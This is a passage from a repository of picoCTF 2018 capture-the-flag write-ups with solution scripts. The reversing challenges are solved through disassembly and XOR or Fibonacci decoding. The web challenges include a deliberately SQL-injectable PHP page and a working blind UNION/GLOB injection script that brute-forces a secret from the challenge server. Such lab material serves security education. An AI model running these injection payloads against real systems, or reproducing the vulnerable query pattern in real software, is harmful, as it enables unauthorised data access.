();\n|           ; CALL XREF from sym.main (0x400887)\n|           0x004007ce      55             push rbp\n|           0x004007cf      4889e5         mov rbp, rsp\n|           0x004007d2      bfb8094000     mov edi, str.Calculating_key... ; 0x4009b8 ; \"Calculating key...\" ; const char *s\n|           0x004007d7      e854fdffff     call sym.imp.puts           ; int puts(const char *s)\n|           0x004007dc      48b8424a68c0.  movabs rax, 0xbb9ff7f4c0684a42\n|           0x004007e6      8905d4082000   mov dword [obj.key], eax    ; obj.__TMC_END ; [0x6010c0:4]=0\n|           0x004007ec      bfcb094000     mov edi, str.Done_calculating_key ; 0x4009cb ; \"Done calculating key\" ; const char *s\n|           0x004007f1      e83afdffff     call sym.imp.puts           ; int puts(const char *s)\n|           0x004007f6      90             nop\n|           0x004007f7      5d             pop rbp\n\\           0x004007f8      c3             ret\n```\n\n```\n$ ./be-quick-or-be-dead-2_patched\nBe Quick Or Be Dead 2\n=====================\n\nCalculating key...\nDone calculating key\nPrinting flag:\npicoCTF{the_fibonacci_sequence_can_be_done_fast_88f31f48}\n```\n\nAnd we get the flag.\n\n### Flag\n`picoCTF{the_fibonacci_sequence_can_be_done_fast_88f31f48}`\n"
  },
  {
    "path": "Reversing/be-quick-or-be-dead-2/solution/calculate.py",
    "content": "n = 1083\n\ndef fib(n):\n    i = 0\n    nextterm = 1\n    present = 1\n    previous = 0\n\n    while i < n:\n        nextterm = present + previous\n        present = previous\n        previous = nextterm\n        i = i + 1\n        #print nextterm\n\n    return nextterm\n\nresult = fib(n)\nprint(result & (2 ** 64 - 1))\n"
  },
  {
    "path": "Reversing/be-quick-or-be-dead-3/README.md",
    "content": "# be-quick-or-be-dead-3\nPoints: 350\n\n## Category\nReversing\n\n## Question\n>As the [song](https://www.youtube.com/watch?v=CTt1vk9nM9c) draws closer to the end, another executable [be-quick-or-be-dead-3](files/be-quick-or-be-dead-3) suddenly pops up. This one requires even faster machines. Can you run it fast enough too? You can also find the executable in /problems/be-quick-or-be-dead-3_1_036263621db6b07c874d55f1e0bba59d. \n\n### Hint\n>How do you speed up a very repetitive computation?\n\n## Solution\nUnsolved.\n\n### Flag\n`flag`\n"
  },
  {
    "path": "Reversing/be-quick-or-be-dead-3/solution/solve.py",
    "content": "def calc(n):\n\tif n <= 4:\n\t\tx = n * n + 0x2345\n\telse:\n\t\tx = calc(n - 5) * 0x1234 + (calc(n - 1) - calc(n - 2) - calc(n - 3) - calc(n - 3))\n\treturn x\n\n\nprint calc(5)\n"
  },
  {
    "path": "Reversing/keygen-me-1/README.md",
    "content": "# keygen-me-1\nPoints: 400\n\n## Category\nReversing\n\n## Question\n>Can you generate a valid product key for the validation [program](files/activate) in /problems/keygen-me-1_1_8eb35cc7858ff1d2f55d30e5428f30a7 \n\n### Hint\nNo Hints.\n\n## Solution\nUnsolved\n\n### Flag\n`flag`\n"
  },
  {
    "path": "Reversing/keygen-me-1/solution/test.c",
    "content": "/*\nint validate_key(int arg0) {\n    var_4 = arg0;\n    esp = (esp - 0x10) + 0x10;\n    var_C = strlen(var_4);\n    var_14 = 0x0;\n    for (var_10 = 0x0; var_C - 0x1 > var_10; var_10 = var_10 + 0x1) {\n            esp = (esp - 0x10) + 0x10;\n            var_14 = var_14 + (var_10 + 0x1) * (sign_extend_32(ord(sign_extend_32(*(int8_t *)(var_4 + var_10) & 0xff))) + 0x1);\n    }\n    eax = *(int8_t *)(var_4 + (var_C - 0x1)) & 0xff;\n    eax = ord(sign_extend_32(eax));\n    eax = var_14 - ((HIDWORD(var_14 * 0x38e38e39) >> 0x3 << 0x3) + (HIDWORD(var_14 * 0x38e38e39) >> 0x3) << 0x2) == sign_extend_32(eax) ? 0x1 : 0x0;\n    return eax;\n}\n*/\n\nint validate_key(int keyArgs) {\n    key = keyArgs;\n    esp = (esp - 0x10) + 0x10;\n    key_length = strlen(key);\n    var_14 = 0;\n    for (int i = 0; key_length - 1 > i; i++) {\n            esp = (esp - 0x10) + 0x10;\n            var_14 += (i + 1) * (sign_extend_32(ord(sign_extend_32(*(int8_t *)(var_4 + i) & 0xff))) + 0x1);\n    }\n    eax = *(int8_t *)(key + (key_length - 0x1)) & 0xff;\n    eax = ord(sign_extend_32(eax));\n    eax = var_14 - ((HIDWORD(var_14 * 0x38e38e39) >> 0x3 << 0x3) + (HIDWORD(var_14 * 0x38e38e39) >> 0x3) << 0x2) == sign_extend_32(eax) ? 0x1 : 0x0;\n    return eax;\n}\n"
  },
  {
    "path": "Reversing/quackme/README.md",
    "content": "# quackme\nPoints: 200\n\n## Category\nReversing\n\n## Question\n>Can you deal with the Duck Web? Get us the flag from this [program](files/main). You can also find the program in /problems/quackme_4_0e48834ea71b521b9f35d29dc7be974e. \n\n### Hint\n>Objdump or something similar is probably a good place to start.\n\n## Solution\nUpon listing all the functions, there are multiple written functions. We can analyse and print the function `do_magic()`\n\n```asm\n[0x08048642]> pdf\n/ (fcn) sym.do_magic 211\n|   sym.do_magic ();\n|           ; var int local_1dh @ ebp-0x1d\n|           ; var int local_1ch @ ebp-0x1c\n|           ; var int local_18h @ ebp-0x18\n|           ; var int local_14h @ ebp-0x14\n|           ; var int local_10h @ ebp-0x10\n|           ; var int local_ch @ ebp-0xc\n|           ; CALL XREF from sym.main (0x804874a)\n|           0x08048642      55             push ebp\n|           0x08048643      89e5           mov ebp, esp\n|           0x08048645      83ec28         sub esp, 0x28               ; '('\n|           0x08048648      e88effffff     call sym.read_input\n|           0x0804864d      8945ec         mov dword [local_14h], eax\n|           0x08048650      83ec0c         sub esp, 0xc\n|           0x08048653      ff75ec         push dword [local_14h]\n|           0x08048656      e835feffff     call sym.imp.strlen         ; size_t strlen(const char *s)\n|           0x0804865b      83c410         add esp, 0x10\n|           0x0804865e      8945f0         mov dword [local_10h], eax\n|           0x08048661      8b45f0         mov eax, dword [local_10h]\n|           0x08048664      83c001         add eax, 1\n|           0x08048667      83ec0c         sub esp, 0xc\n|           0x0804866a      50             push eax\n|           0x0804866b      e8f0fdffff     call sym.imp.malloc         ;  void *malloc(size_t size)\n|           0x08048670      83c410         add esp, 0x10\n|           0x08048673      8945f4         mov dword [local_ch], 
eax\n|           0x08048676      837df400       cmp dword [local_ch], 0\n|       ,=< 0x0804867a      751a           jne 0x8048696\n|       |   0x0804867c      83ec0c         sub esp, 0xc\n|       |   0x0804867f      6884880408     push str.malloc___returned_NULL._Out_of_Memory ; 0x8048884 ; \"malloc() returned NULL. Out of Memory\\n\"\n|       |   0x08048684      e8e7fdffff     call sym.imp.puts           ; int puts(const char *s)\n|       |   0x08048689      83c410         add esp, 0x10\n|       |   0x0804868c      83ec0c         sub esp, 0xc\n|       |   0x0804868f      6aff           push 0xffffffffffffffff\n|       |   0x08048691      e8eafdffff     call sym.imp.exit           ; void exit(int status)\n|       |   ; CODE XREF from sym.do_magic (0x804867a)\n|       `-> 0x08048696      8b45f0         mov eax, dword [local_10h]\n|           0x08048699      83c001         add eax, 1\n|           0x0804869c      83ec04         sub esp, 4\n|           0x0804869f      50             push eax\n|           0x080486a0      6a00           push 0\n|           0x080486a2      ff75f4         push dword [local_ch]\n|           0x080486a5      e816feffff     call sym.imp.memset         ; void *memset(void *s, int c, size_t n)\n|           0x080486aa      83c410         add esp, 0x10\n|           0x080486ad      c745e4000000.  mov dword [local_1ch], 0\n|           0x080486b4      c745e8000000.  
mov dword [local_18h], 0\n|       ,=< 0x080486bb      eb4e           jmp 0x804870b\n|       |   ; CODE XREF from sym.do_magic (0x8048711)\n|      .--> 0x080486bd      8b45e8         mov eax, dword [local_18h]\n|      :|   0x080486c0      0558880408     add eax, obj.sekrutBuffer\n|      :|   0x080486c5      0fb608         movzx ecx, byte [eax]\n|      :|   0x080486c8      8b55e8         mov edx, dword [local_18h]\n|      :|   0x080486cb      8b45ec         mov eax, dword [local_14h]\n|      :|   0x080486ce      01d0           add eax, edx\n|      :|   0x080486d0      0fb600         movzx eax, byte [eax]\n|      :|   0x080486d3      31c8           xor eax, ecx\n|      :|   0x080486d5      8845e3         mov byte [local_1dh], al\n|      :|   0x080486d8      8b1538a00408   mov edx, dword obj.greetingMessage ; [0x804a038:4]=0x80487f0 str.You_have_now_entered_the_Duck_Web__and_you_re_in_for_a_honkin__good_time.__Can_you_figure_out_my_trick\n|      :|   0x080486de      8b45e8         mov eax, dword [local_18h]\n|      :|   0x080486e1      01d0           add eax, edx\n|      :|   0x080486e3      0fb600         movzx eax, byte [eax]\n|      :|   0x080486e6      3a45e3         cmp al, byte [local_1dh]\n|     ,===< 0x080486e9      7504           jne 0x80486ef\n|     |:|   0x080486eb      8345e401       add dword [local_1ch], 1\n|     |:|   ; CODE XREF from sym.do_magic (0x80486e9)\n|     `---> 0x080486ef      837de419       cmp dword [local_1ch], 0x19 ; [0x19:4]=-1 ; 25\n|     ,===< 0x080486f3      7512           jne 0x8048707\n|     |:|   0x080486f5      83ec0c         sub esp, 0xc\n|     |:|   0x080486f8      68ab880408     push str.You_are_winner     ; 0x80488ab ; \"You are winner!\"\n|     |:|   0x080486fd      e86efdffff     call sym.imp.puts           ; int puts(const char *s)\n|     |:|   0x08048702      83c410         add esp, 0x10\n|    ,====< 0x08048705      eb0c           jmp 0x8048713\n|    ||:|   ; CODE XREF from sym.do_magic (0x80486f3)\n|    |`---> 0x08048707   
   8345e801       add dword [local_18h], 1\n|    | :|   ; CODE XREF from sym.do_magic (0x80486bb)\n|    | :`-> 0x0804870b      8b45e8         mov eax, dword [local_18h]\n|    | :    0x0804870e      3b45f0         cmp eax, dword [local_10h]\n|    | `==< 0x08048711      7caa           jl 0x80486bd\n|    `----> 0x08048713      c9             leave\n\\           0x08048714      c3             ret\n```\n\nLet's take a look at what is necessary to reach the `puts(\"You are winner!\");` call. We see that we need to pass this test, where `local_1ch` (_ebp - 0x1c_) must be equal to _0x19_.\n\n\n```asm\n0x080486ef      837de419       cmp dword [local_1ch], 0x19 ; [0x19:4]=-1 ; 25\n...\n0x080486f8      68ab880408     push str.You_are_winner     ; 0x80488ab ; \"You are winner!\"\n0x080486fd      e86efdffff     call sym.imp.puts           ; int puts(const char *s)\n```\n\nLooking around the assembly, we can see that there is an instruction that adds _1_ to _ebp - 0x1c_.\n\n```asm\n0x080486eb      8345e401       add dword [local_1ch], 1\n```\n\nWe also notice that there is a loop at the bottom of the assembly.\n\n```asm\n; CODE XREF from sym.do_magic (0x80486f3)\n0x08048707      8345e801       add dword [local_18h], 1\n; CODE XREF from sym.do_magic (0x80486bb)\n0x0804870b      8b45e8         mov eax, dword [local_18h]\n0x0804870e      3b45f0         cmp eax, dword [local_10h]\n0x08048711      7caa           jl 0x80486bd\n```\n\nDebugging the program, we can see that the number of loop iterations corresponds to the number of characters entered.\n\nWe also see that there's an XOR instruction, where _eax_ holds a character of your input and _ecx_ holds the corresponding byte provided by the binary.\n\n```asm\n0x080486d3      31c8           xor eax, ecx\n```\n\nPutting everything together, it loops through every character in the input, XORs it with the corresponding byte in the binary, and checks that the result equals the corresponding character of the initial message. 
The initial message is: _You have now entered the Duck Web, and you're in for a honkin' good time._\n\nWritten as pseudocode, it looks something like this:\n\n```\ncount = 0\nfor (i = 0; i < length_of_user_input; i++) {\n\tdata = user_input[i] xor binary_data[i]\n\tif (data == initial_message[i]) {\n\t\tcount += 1\n\t}\n\tif (count == 25) {\n\t\tprint \"You are winner!\"\n\t}\n}\n```\n\nLet's leak the values of the binary string. We see that the string is located here:\n\n```asm\n0x080486c0      0558880408     add eax, obj.sekrutBuffer\n```\nGet the value from the address:\n\n```asm\n[0x08048642]> px @ obj.sekrutBuffer\n- offset -   0 1  2 3  4 5  6 7  8 9  A B  C D  E F  0123456789ABCDEF\n0x08048858  2906 164f 2b35 301e 511b 5b14 4b08 5d2b  )..O+50.Q.[.K.]+\n0x08048868  5014 5d00 1917 5952 5d00 4e6f 206c 696e  P.]...YR].No lin\n```\n\nWe only need the first 25 bytes. We can then use a Python program to XOR the data ourselves and get the flag.\n\n```python\n# Greeting string the binary compares against (obj.greetingMessage)\ninitialMsg = \"You have now entered the Duck Web, and you're in for a honkin' good time.\"\n# First 25 bytes of obj.sekrutBuffer\nxorData = bytes.fromhex('2906164f2b35301e511b5b144b085d2b50145d00191759525d')\n\n# input[i] ^ sekrutBuffer[i] must equal greeting[i], so input[i] = sekrutBuffer[i] ^ greeting[i]\nflag = ''\nfor i in range(len(xorData)):\n\tflag += chr(xorData[i] ^ ord(initialMsg[i]))\n\nprint(flag)\n```\n\nAnd we get the flag! Just to confirm, we can pass the flag into the binary:\n\n```\n$ ./main \nYou have now entered the Duck Web, and you're in for a honkin' good time.\nCan you figure out my trick?\npicoCTF{qu4ckm3_5f8d9c17}\nYou are winner!\nThat's all folks.\n```\n\nAnd there we go. This took me 1 whole day to solve. I hate reversing.\n\n### Flag\n`picoCTF{qu4ckm3_5f8d9c17}`\n"
  },
  {
    "path": "Reversing/quackme/solution/solve.py",
    "content": "#!/usr/bin/python\n\ninitialMsg = \"You have now entered the Duck Web, and you're in for a honkin' good time.\"\nxorData = '2906164f2b35301e511b5b144b085d2b50145d00191759525d'.decode('hex')\n\nflag = ''\nfor i in range(len(xorData)):\n\tflag += chr(ord(xorData[i]) ^ ord(initialMsg[i]))\n\nprint flag\n"
  },
  {
    "path": "Reversing/quackme up/README.md",
    "content": "# quackme up\nPoints: 350\n\n## Category\nReversing\n\n## Question\n>The duck puns continue. Can you crack, I mean quack this [program](files/main) as well? You can find the program in /problems/quackme-up_4_5cc9019c8499d6d124cd8e8109a0f95b on the shell server. \n\n### Hint\nNo Hints.\n\n## Solution\nUnsolved.\n\n### Flag\n`flag`\n"
  },
  {
    "path": "Reversing/special-pw/README.md",
    "content": "# special-pw\nPoints: 600\n\n## Category\nReversing\n\n## Question\n>Can you figure out the right argument to this program to login? We couldn't manage to get a copy of the binary but we did manage to [dump](files/special_pw.S) some machine code and memory from the running process. \n\n### Hint\n>Hmmm maybe if we do the reverse of each operation we can get the password?\n\n## Solution\nUnsolved.\n\n### Flag\n`flag`\n"
  },
  {
    "path": "Reversing/special-pw/files/special_pw.S",
    "content": ".intel_syntax noprefix\n.bits 32\n\t\n.global main\t; int main(int argc, char **argv)\n\nmain:\n\tpush   ebp\n\tmov    ebp,esp\n\tsub    esp,0x10\n\tmov    DWORD PTR [ebp-0xc],0x0\n\tmov    eax,DWORD PTR [ebp+0xc]\n\tmov    eax,DWORD PTR [eax+0x4]\n\tmov    DWORD PTR [ebp-0x4],eax\n\tjmp    part_b\npart_a:\n\tadd    DWORD PTR [ebp-0xc],0x1\n\tadd    DWORD PTR [ebp-0x4],0x1\npart_b:\t\n\tmov    eax,DWORD PTR [ebp-0x4]\n\tmovzx  eax,BYTE PTR [eax]\n\ttest   al,al\n\tjne    part_a\n\tmov    DWORD PTR [ebp-0x8],0x0\n\tjmp    part_d\npart_c:\t\n\tmov    eax,DWORD PTR [ebp+0xc]\n\tadd    eax,0x4\n\tmov    edx,DWORD PTR [eax]\n\tmov    eax,DWORD PTR [ebp-0x8]\n\tadd    eax,edx\n\tmov    DWORD PTR [ebp-0x4],eax\n\tmov    eax,DWORD PTR [ebp-0x4]\n\tmovzx  eax,BYTE PTR [eax]\n\txor    eax,0x9d\n\tmov    edx,eax\n\tmov    eax,DWORD PTR [ebp-0x4]\n\tmov    BYTE PTR [eax],dl\n\tmov    eax,DWORD PTR [ebp-0x4]\n\tmovzx  eax,WORD PTR [eax]\n\tror    ax,0x5\n\tmov    edx,eax\n\tmov    eax,DWORD PTR [ebp-0x4]\n\tmov    WORD PTR [eax],dx\n\tmov    eax,DWORD PTR [ebp-0x4]\n\tmov    eax,DWORD PTR [eax]\n\trol    eax,0xb\n\tmov    edx,eax\n\tmov    eax,DWORD PTR [ebp-0x4]\n\tmov    DWORD PTR [eax],edx\n\tadd    DWORD PTR [ebp-0x8],0x1\npart_d:\t\n\tmov    eax,DWORD PTR [ebp-0xc]\n\tsub    eax,0x3\n\tcmp    eax,DWORD PTR [ebp-0x8]\n\tjg     part_c\n\tmov    eax,DWORD PTR [ebp+0xc]\n\tmov    eax,DWORD PTR [eax+0x4]\n\tmov    DWORD PTR [ebp-0x4],eax\n\tmov    DWORD PTR [ebp-0x10],0x14890ba\n\tjmp    part_f\npart_e:\t\n\tmov    eax,DWORD PTR [ebp-0x4]\n\tmovzx  edx,BYTE PTR [eax]\n\tmov    eax,DWORD PTR [ebp-0x10]\n\tmovzx  eax,BYTE PTR [eax]\n\tcmp    dl,al\n\tje     part_k\n\tmov    eax,0x0\n\tjmp    part_h\npart_k:\t\n\tadd    DWORD PTR [ebp-0x4],0x1\n\tadd    DWORD PTR [ebp-0x10],0x1\npart_f:\t\n\tmov    eax,DWORD PTR [ebp-0x10]\n\tmovzx  eax,BYTE PTR [eax]\n\ttest   al,al\n\tjne    part_e\n\tmov    eax,DWORD PTR [ebp+0xc]\n\tadd    eax,0x4\n\tmov    eax,DWORD PTR 
[eax]\n\tmov    edx,DWORD PTR [ebp-0x10]\n\tmov    ecx,0x14890ba\n\tsub    edx,ecx\n\tadd    eax,edx\n\tmovzx  eax,BYTE PTR [eax]\n\ttest   al,al\n\tje     part_g\n\tmov    eax,0x0\t\t\t; LOGIN_FAILED\n\tjmp    part_h\npart_g:\t\n\tmov    eax,0x1\t\t\t; LOGIN_SUCCESS\npart_h:\t\n\tleave\n\tret\n\n\n\n014890BA:  7b 18 a6 36 da 3b 2b a6  fe cb 82 ae 96 ff 9f 46   |{..6.;+........F|\n014890CA:  8f 36 a7 af fe 93 8e 3f  46 a7 ff 82 cf ce b3 97   |.6.....?F.......|\n014890DA:  17 1a a7 36 ef 2b 8a ed  00                        |...6.+...|\n\n\n\n\n\n"
  },
  {
    "path": "Web Exploitation/A Simple Question/README.md",
    "content": "# A Simple Question\nPoints: 650\n\n## Category\nWeb Exploitation\n\n## Question\n>There is a website running at http://2018shell1.picoctf.com:2644 ([link](http://2018shell1.picoctf.com:2644/)). Try to see if you can answer its question. \n\n### Hint\nNo Hints.\n\n## Solution\nLooking at the source code, we can see that this web application is vulnerable to SQL injections.\n\n```php\ninclude \"config.php\";\nini_set('error_reporting', E_ALL);\nini_set('display_errors', 'On');\n\n$answer = $_POST[\"answer\"];\n$debug = $_POST[\"debug\"];\n$query = \"SELECT * FROM answers WHERE answer='$answer'\";\necho \"<pre>\";\necho \"SQL query: \", htmlspecialchars($query), \"\\n\";\necho \"</pre>\";\n```\n\nHowever, it doesn't appear to print anything out, but just tells you either you're wrong, you're close, or you get the flag\n\n```php\n$con = new SQLite3($database_file);\n$result = $con->query($query);\n\n$row = $result->fetchArray();\nif($answer == $CANARY)  {\n\techo \"<h1>Perfect!</h1>\";\n\techo \"<p>Your flag is: $FLAG</p>\";\n}\nelseif ($row) {\n\techo \"<h1>You are so close.</h1>\";\n} else {\n\techo \"<h1>Wrong.</h1>\";\n}\n```\n\nAlright, let's create a small injection to slowly brute-force the answer.\n`' UNION SELECT * FROM answers WHERE answer GLOB '<input>*'; --`\n\nWe use _GLOB_ instead of _LIKE_ because it's case-sensitive. Also we use _*_ or _%_ because _GLOB_ uses Unix wildcards.\n\nWe run the script and get the flag.\n\n```python\nfinal = ''\nwhile True:\n\tfor i in range(0x20, 0x7f):\n\t\tif i != 42 and i != 63: # Removes Unix wildcards '*' and '?'\n\t\t\tparams = {\n\t\t\t\t'answer': \"' UNION SELECT * FROM answers WHERE answer GLOB '{}{}*'; --\".format(final, chr(i))\n\t\t\t}\n\t\t\tr = requests.post('http://2018shell1.picoctf.com:2644/answer2.php', data=params)\n\t\t\tres = r.text\n\t\t\tprint res\n```\n\nWorking solution [solve.py](solution/solve.py)\n\n### Flag\n`picoCTF{qu3stions_ar3_h4rd_28fc1206}`\n"
  },
  {
    "path": "Web Exploitation/A Simple Question/solution/solve.py",
    "content": "#!/usr/bin/python\nimport requests\nimport re\n\ndef brute():\n\tfinal = ''\n\twhile True:\n\t\tfor i in range(0x20, 0x7f):\n\t\t\tif i != 42 and i != 63: # Removes Unix wildcards '*' and '?'\n\t\t\t\tparams = {\n\t\t\t\t\t'answer': \"' UNION SELECT * FROM answers WHERE answer GLOB '{}{}*'; --\".format(final, chr(i))\n\t\t\t\t}\n\t\t\t\tr = requests.post('http://2018shell1.picoctf.com:2644/answer2.php', data=params)\n\t\t\t\tres = r.text\n\t\t\t\tprint res\n\n\t\t\tif 'You are so close.' in res:\n\t\t\t\tfinal += chr(i)\n\t\t\t\tprint final\n\t\t\t\tbreak\n\t\t\telif i == 0x7e:\n\t\t\t\treturn final # 41AndSixSixths\n\nans = brute()\nflag = requests.post('http://2018shell1.picoctf.com:2644/answer2.php', data={'answer': ans}).text\nprint 'Flag: ' + re.findall(r'(picoCTF\\{.+\\})', flag)[0]\n"
  },
  {
    "path": "Web Exploitation/A Simple Question/solution/source/answer2.phps",
    "content": "<?php\n  include \"config.php\";\n  ini_set('error_reporting', E_ALL);\n  ini_set('display_errors', 'On');\n\n  $answer = $_POST[\"answer\"];\n  $debug = $_POST[\"debug\"];\n  $query = \"SELECT * FROM answers WHERE answer='$answer'\";\n  echo \"<pre>\";\n  echo \"SQL query: \", htmlspecialchars($query), \"\\n\";\n  echo \"</pre>\";\n?>\n<?php\n  $con = new SQLite3($database_file);\n  $result = $con->query($query);\n\n  $row = $result->fetchArray();\n  if($answer == $CANARY)  {\n    echo \"<h1>Perfect!</h1>\";\n    echo \"<p>Your flag is: $FLAG</p>\";\n  }\n  elseif ($row) {\n    echo \"<h1>You are so close.</h1>\";\n  } else {\n    echo \"<h1>Wrong.</h1>\";\n  }\n?>\n"
  },
  {
    "path": "Web Exploitation/A Simple Question/solution/source/index.html",
    "content": "<!doctype html>\n<html>\n<head>\n    <title>Question</title>\n    <link rel=\"stylesheet\" type=\"text/css\" href=\"//maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css\">\n</head>\n<body>\n<div class=\"container\">\n    <div class=\"row\">\n        <div class=\"col-md-12\">\n            <div class=\"panel panel-primary\" style=\"margin-top:50px\">\n                <div class=\"panel-heading\">\n                    <h3 class=\"panel-title\">A Simple Question</h3>\n                </div>\n                <div class=\"panel-body\">\n                    <div>\n                        What is the answer?\n                    </div>  \n                    <form action=\"answer2.php\" method=\"POST\">\n<!-- source code is in answer2.phps -->\n                        <fieldset>\n                            <div class=\"form-group\">\n                                <div class=\"controls\">\n                                    <input id=\"answer\" name=\"answer\" class=\"form-control\">\n                                </div>\n                            </div>\n\n                            <input type=\"hidden\" name=\"debug\" value=\"0\">\n\n                            <div class=\"form-actions\">\n                                <input type=\"submit\" value=\"Answer\" class=\"btn btn-primary\">\n                            </div>\n                        </fieldset>\n                    </form>\n                </div>\n            </div>\n        </div>\n    </div>\n</div>\n</body>\n</html>\n"
  },
  {
    "path": "Web Exploitation/Artisinal Handcrafted HTTP 3/README.md",
    "content": "# Artisinal Handcrafted HTTP 3\nPoints: 300\n\n## Category\nWeb Exploitation\n\n## Question\n>We found a hidden flag server hiding behind a proxy, but the proxy has some... _interesting_ ideas of what qualifies someone to make HTTP requests. Looks like you'll have to do this one by hand. Try connecting via `nc 2018shell1.picoctf.com 42496`, and use the proxy to send HTTP requests to `flag.local`. We've also recovered a username and a password for you to use on the login page: `realbusinessuser`/`potoooooooo`. \n\n### Hint\n>_Be the browser._ When you navigate to a page, how does your browser send HTTP requests? How does this change when you submit a form?\n\n## Solution\nDoing an initial GET request for _/_, we can see a link to _/login_\n\n```html\nGET / HTTP/1.1\nHost: flag.local\n\nHTTP/1.1 200 OK\nx-powered-by: Express\ncontent-type: text/html; charset=utf-8\ncontent-length: 321\netag: W/\"141-LuTf9ny9p1l454tuA3Un+gDFLWo\"\ndate: Sun, 30 Sep 2018 14:26:00 GMT\nconnection: close\n\n\n<html>\n\n<head>\n\t<link rel=\"stylesheet\" type=\"text/css\" href=\"main.css\" />\n</head>\n\n<body>\n\t<header>\n\t\t<h1>Real Business Internal Flag Server</h1>\n\t\t<a href=\"/login\">Login</a>\n\t</header>\n\t<main>\n\t\t<p>You need to log in before you can see today's flag.</p>\n\t</main>\n</body>\n\n</html>\n```\n\nWhen we do another GET request for _/login_, we can see the paramters of required. 
We can use the username and password provided in the question.\n\n```html\nGET /login HTTP/1.1\nHost: flag.local\n\nHTTP/1.1 200 OK\nx-powered-by: Express\ncontent-type: text/html; charset=utf-8\ncontent-length: 498\netag: W/\"1f2-UE5AGAqbLVQn1qrfKFRIqanxl9I\"\ndate: Sun, 30 Sep 2018 14:35:39 GMT\nconnection: close\n\n\n<html>\n\n<head>\n\t<link rel=\"stylesheet\" type=\"text/css\" href=\"main.css\" />\n</head>\n\n<body>\n\t<header>\n\t\t<h1>Real Business Internal Flag Server</h1>\n\t\t<a href=\"/login\">Login</a>\n\t</header>\n\t<main>\n\t\t<h2>Log In</h2>\n\n\t\t<form method=\"POST\" action=\"login\">\n\t\t\t<input type=\"text\" name=\"user\" placeholder=\"Username\" />\n\t\t\t<input type=\"password\" name=\"pass\" placeholder=\"Password\" />\n\t\t\t<input type=\"submit\" />\n\t\t</form>\n\t</main>\n</body>\n\n</html>\n```\n\nWhen we send a POST request to _/login_ with the username and password, a cookie is set.\n\n```html\nPOST /login HTTP/1.1\nHost: flag.local\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 38\nConnection: keep-alive\nUpgrade-Insecure-Requests: 1\n\nuser=realbusinessuser&pass=potoooooooo\nHTTP/1.1 302 Found\nx-powered-by: Express\nset-cookie: real_business_token=PHNjcmlwdD5hbGVydCgid2F0Iik8L3NjcmlwdD4%3D; Path=/\nlocation: /\nvary: Accept\ncontent-type: text/html; charset=utf-8\ncontent-length: 46\ndate: Sun, 30 Sep 2018 14:37:38 GMT\nconnection: keep-alive\n\n<p>Found. 
Redirecting to <a href=\"/\">/</a></p>\n```\n\nAll we have to do now is send the cookie with a request for _/_ and get the flag.\n\n```html\nGET / HTTP/1.1\nHost: flag.local\nCookie: real_business_token=PHNjcmlwdD5hbGVydCgid2F0Iik8L3NjcmlwdD4%3D;\n\nHTTP/1.1 200 OK\nx-powered-by: Express\ncontent-type: text/html; charset=utf-8\ncontent-length: 438\netag: W/\"1b6-eYJ8DUTdkgByyfWFi6OJJSjopFg\"\ndate: Sun, 30 Sep 2018 14:38:54 GMT\nconnection: close\n\n\n<html>\n\t<head>\n\t\t<link rel=\"stylesheet\" type=\"text/css\" href=\"main.css\" />\n\t</head>\n\t<body>\n\t\t<header>\n\t\t\t<h1>Real Business Internal Flag Server</h1>\n\t\t\t<div class=\"user\">Real Business Employee</div>\n\t\t\t<a href=\"/logout\">Logout</a>\n\t\t</header>\n\t\t<main>\n\t\t\t<p>Hello <b>Real Business Employee</b>!  Today's flag is: <code>picoCTF{0nLY_Us3_n0N_GmO_xF3r_pR0tOcol5_2e14}</code>.</p>\n\t\t</main>\n\t</body>\n</html>\n```\n\nWorking solution [solve.py](solution/solve.py)\n\n### Flag\n`picoCTF{0nLY_Us3_n0N_GmO_xF3r_pR0tOcol5_2e14}`\n"
  },
  {
    "path": "Web Exploitation/Artisinal Handcrafted HTTP 3/solution/solve.py",
    "content": "#!/usr/bin/python\n\nfrom pwn import *\nimport time\nimport re\n\ns = remote('2018shell1.picoctf.com', 42496)\n\ntime.sleep(1)\nprint s.recv(),\ncaptcha = raw_input('')\n\ns.sendline(captcha)\ntime.sleep(1)\n\nfail = s.recv().strip()\n\nif 'succeeded' in fail:\n\tprint \n\treq = '''GET / HTTP/1.1\nHost: flag.local\nCookie: real_business_token=PHNjcmlwdD5hbGVydCgid2F0Iik8L3NjcmlwdD4%3D;\n'''\n\n\tprint req\n\ts.sendline(req)\n\ttime.sleep(1)\n\tsource = s.recv()\n\n\tprint re.findall(r'(picoCTF\\{.+\\})', source)[0]\nelse:\n\tlog.info('Wrong validation!')\n\ns.close()\n"
  },
  {
    "path": "Web Exploitation/Buttons/README.md",
    "content": "# Buttons\nPoints: 250\n\n## Category\nWeb Exploitation\n\n## Question\n>There is a website running at http://2018shell1.picoctf.com:21579 ([link](http://2018shell1.picoctf.com:21579/)). Try to see if you can push their buttons. \n\n### Hint\n>What's different about the two buttons?\n\n## Solution\nFollow the buttons and get Rick Roll'd!\n\nIn _boo.html_, looking at the source, we can see that _button2.php_ is expecting a POST request. As such, all we have to do is send a POST request and get the flag.\n\nWorking solution [solve.py](solution/solve.py)\n\n### Flag\n`picoCTF{button_button_whose_got_the_button_ed306c10}`\n"
  },
  {
    "path": "Web Exploitation/Buttons/solution/solve.py",
    "content": "#!/usr/bin/python\n\nimport requests\nimport re\n\nr = requests.post('http://2018shell1.picoctf.com:21579/button2.php')\nsource = r.text\n\nprint re.findall(r'(picoCTF\\{.+\\})', source)[0]\n"
  },
  {
    "path": "Web Exploitation/Buttons/solution/source/boo.html",
